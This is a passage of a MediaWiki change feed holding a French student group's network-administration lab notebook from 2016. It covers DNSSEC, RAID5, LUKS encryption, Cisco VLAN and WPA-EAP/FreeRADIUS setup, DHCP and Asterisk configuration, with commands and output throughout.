speedflash.space.    604800    IN    DNSKEY    256 3 5 AwEAAcHrx5vtsGzY7LF32x3HRIXRwOBm3WZM02NHY4s0uB2djn6tV52B ss78iXC4O5hdpJ0uOxS0/MNCYNJkIXnWsvAHc6lbdWfQ8Jvnj/aBMz94 agXbxXkseqjlIcF1huspBAi9lcY5hsy59MDek5iNlduy8HK6AVItqeQi HviShcq3&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remarque bien la présence de DNSKEY qui nous assure que notre DNS est sécurisé.&amp;lt;br /&amp;gt;&lt;br /&gt;
====Travail réalisé la 7e séance====&lt;br /&gt;
=====Création du RAID5=====&lt;br /&gt;
On ajoute premièrement les partitions à la définition de la machine virtuelle:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;'phy:/dev/virtual/RedFlash,xvdb,w',&lt;br /&gt;
'phy:/dev/virtual/BlackFlash,xvdc,w',&lt;br /&gt;
'phy:/dev/virtual/ReverseFlash,xvdd,w'&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, on crée le RAID5 avec les 3 partitions :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mdadm --create /dev/md0 --level=5 --raid-devices 3 /dev/xvdb /dev/xvdc /dev/xvdd&amp;lt;/pre&amp;gt;&lt;br /&gt;
On vérifie en regardant le fichier de log /proc/mdstat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.0% (692512/1047552) finish=0.1min speed=30109K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===============&amp;gt;.....]  recovery = 78.5% (823084/1047552) finish=0.1min speed=29395K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [================&amp;gt;....]  recovery = 84.2% (883700/1047552) finish=0.0min speed=29456K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=================&amp;gt;...]  recovery = 87.4% (916664/1047552) finish=0.0min speed=29569K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 93.5% (980148/1047552) finish=0.0min speed=30182K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 96.6% (1012980/1047552) finish=0.0min speed=30267K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 98.1% (1029332/1047552) finish=0.0min speed=30794K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 99.5% (1043028/1047552) finish=0.0min speed=30260K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# [ 1462.872022] md: md0: recovery done.&lt;br /&gt;
cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, on affecte un système de fichier à notre nouveau RAID sur /dev/md0, et on le monte dans /mnt: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# mkfs /dev/md0&lt;br /&gt;
mke2fs 1.42.12 (29-Aug-2014)&lt;br /&gt;
Creating filesystem with 523776 4k blocks and 131072 inodes&lt;br /&gt;
Filesystem UUID: ca2b4bcd-57d3-4f12-bc49-0f7f9cb312b6&lt;br /&gt;
Superblock backups stored on blocks:&lt;br /&gt;
	32768, 98304, 163840, 229376, 294912&lt;br /&gt;
&lt;br /&gt;
Allocating group tables: done&lt;br /&gt;
Writing inode tables: done&lt;br /&gt;
Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
root@Flash:~# mount /dev/md0 /mnt&lt;br /&gt;
[ 1486.818679] EXT4-fs (md0): mounting ext2 file system using the ext4 subsystem&lt;br /&gt;
[ 1486.878898] EXT4-fs (md0): mounted filesystem without journal. Opts: (null)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Cryptage de données=====&lt;br /&gt;
Pour crypter les données, on installe GParted et cryptsetup. Sur la SD, il ne doit y avoir qu'une seule partition. C'est ce qu'on fait grâce à GParted.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, on commence le cryptage des données sur la carte SD: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/mmcblk1p1 &lt;br /&gt;
&lt;br /&gt;
WARNING!&lt;br /&gt;
========&lt;br /&gt;
Cette action écrasera définitivement les données sur /dev/mmcblk1p1.&lt;br /&gt;
&lt;br /&gt;
Are you sure? (Type uppercase yes): YES&lt;br /&gt;
Saisissez la phrase secrète : ***************&lt;br /&gt;
Vérifiez la phrase secrète : ***************&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on ouvre le volume crypté et on crée un système de fichiers avec le dossier home/ :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# cryptsetup luksOpen /dev/mmcblk1p1 home&lt;br /&gt;
Saisissez la phrase secrète pour /dev/mmcblk1p1 : &lt;br /&gt;
root@Rason:/home/pifou# mkfs.ext4 /dev/mapper/home&lt;br /&gt;
mke2fs 1.42.12 (29-Aug-2014)&lt;br /&gt;
En train de créer un système de fichiers avec 3777792 4k blocs et 944704 i-noeuds.&lt;br /&gt;
UUID de système de fichiers=2c54cece-155f-44ed-b4a5-96b9429e7879&lt;br /&gt;
Superblocs de secours stockés sur les blocs : &lt;br /&gt;
	32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208&lt;br /&gt;
&lt;br /&gt;
Allocation des tables de groupe : complété                        &lt;br /&gt;
Écriture des tables d'i-noeuds : complété                        &lt;br /&gt;
Création du journal (32768 blocs) : complété&lt;br /&gt;
Écriture des superblocs et de l'information de comptabilité du système de&lt;br /&gt;
fichiers : complété&amp;lt;/pre&amp;gt;&lt;br /&gt;
On monte la partition : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# mount -t ext4 /dev/mapper/home /mnt/&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous avons écrit dans la carte SD, et nous avons démonté la partition et fermé la partition crypté: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Rason:/# umount /mnt&lt;br /&gt;
root@Rason:/# cryptsetup luksClose home&amp;lt;/pre&amp;gt;&lt;br /&gt;
====Travail réalisé la 8e séance====&lt;br /&gt;
=====Modification routeur pour prise en charge Wifi=====&lt;br /&gt;
Nous avons du modifier la configuration de notre routeur afin de prendre en compte notre borne Wifi. Nous avons donc rajouté le BDI1 avec comme adresse de routeur 10.60.1.1. &amp;lt;br /&amp;gt;&lt;br /&gt;
Ce BDI est un peu spécial, dans la mesure où il doit pouvoir avoir accès à tous les autres BDI. Les paquets qui y transitent ne doivent donc pas être taggés par le protocole DOT1Q (protocole VLAN). C'est pourquoi, dans notre configuration, nous avons ajouté la ligne '''encapsulation untagged''', pour éviter que les paquets ne soient taggés par le numéro de VLAN.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Sécurisation Wifi par WPA-EAP=====&lt;br /&gt;
Pour cette partie, nous commençons donc à installer un serveur FreeRadius sur notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Dans le fichier '''users''', nous ajoutons notre login et notre mot de passe qui nous serviront à nous connecter à la borne : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; flash Cleartext-Password:=&amp;quot;reverse&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Dans le fichier '''clients.conf''', nous ajoutons la configuration de la borne de la E306 :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; client E306 {&lt;br /&gt;
	ipaddr		= 10.60.1.2&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, on passe à la configuration de la borne Wifi. On se connecte en telnet via '''telnet 10.60.1.2''' : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;aaa authentication login eap_flash group radius_flash&lt;br /&gt;
radius-server host 193.48.57.165 auth-port 1812 acct-port 1813 key kadoc&lt;br /&gt;
aaa group server radius radius_flash&lt;br /&gt;
server 193.48.57.165 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
dot11 ssid SSID_FLASH&lt;br /&gt;
vlan 6&lt;br /&gt;
authentication open eap eap_flash&lt;br /&gt;
authentication network-eap eap_flash&lt;br /&gt;
authentication key-management wpa&lt;br /&gt;
mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption vlan 6 mode ciphers aes-ccm tkip&lt;br /&gt;
ssid SSID_FLASH&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.6&lt;br /&gt;
encapsulation dot1Q 6&lt;br /&gt;
no ip route-cache&lt;br /&gt;
bridge-group 6&lt;br /&gt;
bridge-group 6 subscriber-loop-control&lt;br /&gt;
bridge-group 6 spanning-disabled&lt;br /&gt;
bridge-group 6 block-unknown-source&lt;br /&gt;
no bridge-group 6 source-learning&lt;br /&gt;
no bridge-group 6 unicast-flooding &lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.6&lt;br /&gt;
encapsulation dot1Q 6&lt;br /&gt;
bridge-group 6&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons maintenant configurer l'interface wlan0 de notre eeePc pour pouvoir se connecter à la borne. Comme nous n'avons pas encore de serveur DHCP, nous devons la configurer manuellement, en prenant une adresse dans notre VLAN :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
  address 10.60.6.6&lt;br /&gt;
  netmask 255.255.255.0&lt;br /&gt;
  gateway 10.60.6.1&lt;br /&gt;
  wpa-ssid SSID_FLASH&lt;br /&gt;
  wpa-key-mgmt WPA-EAP&lt;br /&gt;
  wpa-identity flash&lt;br /&gt;
  wpa-password reverse&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons lancer notre serveur FreeRadius en mode debug via '''freeradius -X'''. &amp;lt;br /&amp;gt;&lt;br /&gt;
On arrive bien à détecter notre SSID (SSID_FLASH) via un smartphone, et nous arrivons à ping notre eeePc depuis la machine virtuelle .&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# ping 10.60.6.6&lt;br /&gt;
PING 10.60.6.6 (10.60.6.6) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 10.60.6.6: icmp_seq=1 ttl=63 time=8.03 ms&lt;br /&gt;
64 bytes from 10.60.6.6: icmp_seq=2 ttl=63 time=13.2 ms&lt;br /&gt;
64 bytes from 10.60.6.6: icmp_seq=3 ttl=63 time=3.42 ms&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
====Travail réalisé la 9e séance====&lt;br /&gt;
=====Serveur DHCP=====&lt;br /&gt;
Nous avons installé le paquet '''isc-dhcp-server'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous avons modifié le fichier de configuration du serveur DHCP''' /etc/dhcp/dhcpd.conf''':&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;option domain-name &amp;quot;speedflash.space&amp;quot;;&lt;br /&gt;
option domain-name-servers 193.48.57.165;&lt;br /&gt;
&lt;br /&gt;
subnet 10.60.6.0 netmask 255.255.255.0 {&lt;br /&gt;
      range 10.60.6.10 10.60.6.40;&lt;br /&gt;
      option routers 10.60.6.1;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite modifié le fichier '''/etc/default/isc-dhcp-server''' pour y ajouter wlan0 comme interface à prendre en compte.&lt;br /&gt;
Nous avons redémarré le serveur en lançant '''service isc-dhcp-server restart'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
En se connectant avec un smartphone en DHCP, nous arrivons à avoir une adresse IP : &amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:DHCP iphone.png]] &amp;lt;br /&amp;gt;&lt;br /&gt;
et nous arrivons à la pinger depuis la machine virtuelle.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# ping 10.60.6.10&lt;br /&gt;
PING 10.60.6.10 (10.60.6.10) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 10.60.6.10: icmp_seq=1 ttl=63 time=81.8 ms&lt;br /&gt;
64 bytes from 10.60.6.10: icmp_seq=2 ttl=63 time=132 ms&lt;br /&gt;
64 bytes from 10.60.6.10: icmp_seq=3 ttl=63 time=69.4 ms&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====PCBX=====&lt;br /&gt;
Nous avons modifiés le fichier sip.conf :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;[general]&lt;br /&gt;
hasvoicemail=yes&lt;br /&gt;
hassip=yes&lt;br /&gt;
hasiax=yes&lt;br /&gt;
callwaiting=yes&lt;br /&gt;
threewaycalling=yes&lt;br /&gt;
callwaitingcallerid=yes&lt;br /&gt;
transfer=yes&lt;br /&gt;
canpark=yes&lt;br /&gt;
cancallforward=yes&lt;br /&gt;
callreturn=yes&lt;br /&gt;
callgroup=1&lt;br /&gt;
pickupgroup=1&lt;br /&gt;
nat=yes&lt;br /&gt;
&lt;br /&gt;
[6001]&lt;br /&gt;
type=friend&lt;br /&gt;
host=dynamic&lt;br /&gt;
dtmfmode=rfc2833&lt;br /&gt;
disallow=all&lt;br /&gt;
allow=ulaw&lt;br /&gt;
fullname=ThomasStephane&lt;br /&gt;
username=trojSmaia&lt;br /&gt;
secret=secret&lt;br /&gt;
context=work&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis, nous avons modifiés le fichier /etc/asterisk/extensions.conf pour ajouter le contexte work à notre PCBX:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;[work]&lt;br /&gt;
exten=&amp;gt;_6XXX,1,Dial(SIP/${EXTEN},20)&lt;br /&gt;
exten =&amp;gt; _6XXX,2,Hangup()&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous n'avons pas encore testé cette solution.&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:DHCP_iphone.PNG&amp;diff=35994</id>
		<title>Fichier:DHCP iphone.PNG</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:DHCP_iphone.PNG&amp;diff=35994"/>
				<updated>2016-12-13T14:04:21Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35993</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35993"/>
				<updated>2016-12-13T14:03:25Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Serveur DHCP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | Test de la configuration locale&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (07/11)&lt;br /&gt;
 | Configuration OSPF - Configuration locale IPv6 - Configuration RIP - Configuration VRRP - Cassage de clé WEP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (17/11 - additionnel)&lt;br /&gt;
 | Protocole HSRP - Cassage de clé WPA - Configuration DNS - Securisation de site par SSL - Securisation de DNS par DNSSEC - LVM&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | RAID5 - Cryptage de données&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (additionnel - 7-8/12/2016)&lt;br /&gt;
 | Modification configuration routeur pour prise en charge Wifi - Sécurisation Wifi par WPA-EAP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 9 (12/12)&lt;br /&gt;
 | Configuration DHCP - PCBX&lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère séance ====&lt;br /&gt;
&lt;br /&gt;
Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2e et 3e séance (2 séances) ====&lt;br /&gt;
Durant cette semaine, nous avons réalisés la configuration locale du routeur (configuration des VLANs). &amp;lt;br /&amp;gt;&lt;br /&gt;
Comme le 4331 est une nouvelle génération de routeur encore non utilisée en TP de PRA, nous devons apprendre comment l'utiliser.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration générale=====&lt;br /&gt;
Communication: '''Série 9800 Bauds 8 bits sans parité sans contrôle de flux'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Lors de sa première mise en route, nous devons effectuer sa configuration générale :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; hostname cisco config hostname&lt;br /&gt;
 enable secret reverse &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis ensuite, nous pouvons passer à la configuration des VALNs.&lt;br /&gt;
=====Configuration des VLANs =====&lt;br /&gt;
Nous avons 12 VLANs à configurer :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 11 VLANs (2-11) : VLAN correspondant aux différents groupes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (12) : VLAN des Machines virtuelles. Permet la communication entre Cordouan et les Commutateurs&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (13) : VLAN d'interconnexion. Permet la communication entre le routeur local et le routeur de l'école&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
Sur l'interface physique du 4331, il y a 3 interfaces:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/0 : disponible en cuivre et en fibre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/1: disponible en cuivre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/2: disponible en fibre&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons connecter notre routeur aux 2 commutateurs 6006 prévus dans l'architecture du TP. Pour cela, il faut que les 2 commutateurs aient les mêmes informations. Pour cela, nous devons créer des '''bridge-domain'''. Des bridge-domain permettent de rassembler 2 sous interfaces de 2 interfaces différentes pour qu'elles aient la même IP. L'interface principale n'aura pas d'adresse IP, les sous interfaces non plus, l'adresse IP sera placé sur le bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Exemple: '''VLAN2 : Gi 0/0/0.2 et Gi 0/0/1.2 seront dans le même bridge-domain 2'''&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les 4331 étant une nouvelle génération de routeur encore non testée à l'école, il fallait apprendre à s'en servir.&amp;lt;br /&amp;gt;&lt;br /&gt;
La plupart des commandes CISCO de base restent inchangées. Cependant, la création des sous interfaces a changée. Avant, nous devions créer des interfaces comme suit:&lt;br /&gt;
&amp;lt;pre&amp;gt; interface GigabitEthernet 0/0/0.X &amp;lt;/pre&amp;gt;&lt;br /&gt;
Avec le nouvel IOS (IOS ISR), nous ne pouvons pas créer des sous interfaces comme ci-dessus dans le but de les mettre dans un bridge.&lt;br /&gt;
Nous devons passer par une nouvelle commande qui s'appelle '''service instance''' :&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi 0/0/0&lt;br /&gt;
 service instance &amp;lt;n°VLAN&amp;gt; ethernet &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous avons la sous interface numéro 2 de l'interface principale 0/0/0.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons alors créer nous sous interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
&lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
    encapsulation dot1q 3&lt;br /&gt;
    bridge-domain 3&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nos sous interfaces sont crées et sont placés dans les différents bridge domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Configuration des bridge-domain=====&lt;br /&gt;
Afin d'allouer des IP aux différents bridge domain, il faut prévenir le routeur que nous utilisons des bridge-domain:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge irb &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous devons préciser quel protocole nous devons utiliser et si les adresses IP des bridge domain seront des adresses routées :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge 2 protocol ieee&lt;br /&gt;
 bridge 2 route ip&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, nous pouvons allouer des IP aux différents bridge domain :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;int BDI2&lt;br /&gt;
  ip address 10.60.2.1 255.255.255.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous répétons ces opérations pour tous les bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Afin de tester si notre configuration locale est correcte, nous devons racker notre routeur, le connecter à un des 6006, puis connecter le 6006 à Cordouan (groupe BONDING). Ainsi, nous pourrons voir si nous pouvons ping notre routeur depuis notre VM.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 4e séance====&lt;br /&gt;
=====Test 1=====&lt;br /&gt;
Cette semaine, nous avons testés la configuration locale de notre routeur. Nous avons donc tentés de ping le routeur depuis notre VM. &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour tester, nous avons besoin d'un port disponible sur CORDOUAN qui est dans le bridge IMA5sc.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après des essais laborieux, nous décidons donc de regarder les adresses MAC des ports afin de les rassembler. Si 4 ports ont le même radical MAC, c'est qu'ils font partis d'un groupe de 4. Nous avons donc choisis '''eth4'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, il fallait trouver le port physique correspondant a eth4. '''Grâce au fichier /etc/udev/rules.d/70-persistence-net.rules''', on peut voir l'association du port physique à l'interface. Voici l'extrait qui nous intéresse: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;# PCI device 0x14e4:0x1657 (tg3)&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:40&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth4&amp;quot;&lt;br /&gt;
